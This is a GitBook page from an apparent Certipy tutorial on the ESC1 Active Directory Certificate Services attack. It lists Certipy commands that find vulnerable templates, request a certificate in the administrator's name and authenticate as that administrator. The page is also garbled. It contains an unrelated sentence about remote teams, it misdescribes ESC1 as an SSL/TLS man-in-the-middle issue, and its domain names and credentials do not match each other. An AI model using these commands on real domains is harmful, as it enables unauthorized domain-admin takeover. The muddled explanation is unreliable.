Certipy
  • 👋Certipy - ADCS
  • Tool
    • 🚀Install Certify
      • Docker
    • Parameters
      • Account
      • Auth
      • CA
      • Cert
      • Find
      • Forge
  • Certificates
    • Certificates
    • Shadow Certificates
    • Golden Certificates
  • Find Vulnerabilities
    • Page 1
  • Domain Escalation
    • 1️⃣ESC1 - Arbitrary Subject Alternative Name (SAN)
    • 2️⃣ESC2
    • 3️⃣ESC3
Powered by GitBook
On this page

Was this helpful?

  1. Domain Escalation

ESC1 - Arbitrary Subject Alternative Name (SAN)

An Arbitrary Subject Alternative Name (SAN) attack refers to a situation where an attacker can manipulate or insert unauthorized Subject Alternative Name entries into an SSL/TLS certificate.

PreviousPage 1NextESC2

Last updated 1 year ago

Was this helpful?

The Subject Alternative Name field in a certificate is used to specify additional host names for a single SSL certificate. This attack could allow malicious actors to impersonate legitimate entities or conduct man-in-the-middle attacks.

Being a remote team means team members work from home or in a co-working space.

certipy find -u rfs@ad-attacks.rfs -p 'Password123!' -dc-ip 192.168.1.110
certipy req -username rfs@ad-attacks.local -password Passw0rd -ca corp-DC-CA -target ca.ad-attacks.local -template ESC1-Test -upn administrator@ad-attacks.local -dns dc.ad-attacks.local
certipy auth -pfx administrator_dc.pfx -dc-ip 172.16.126.128

1️⃣
Page cover image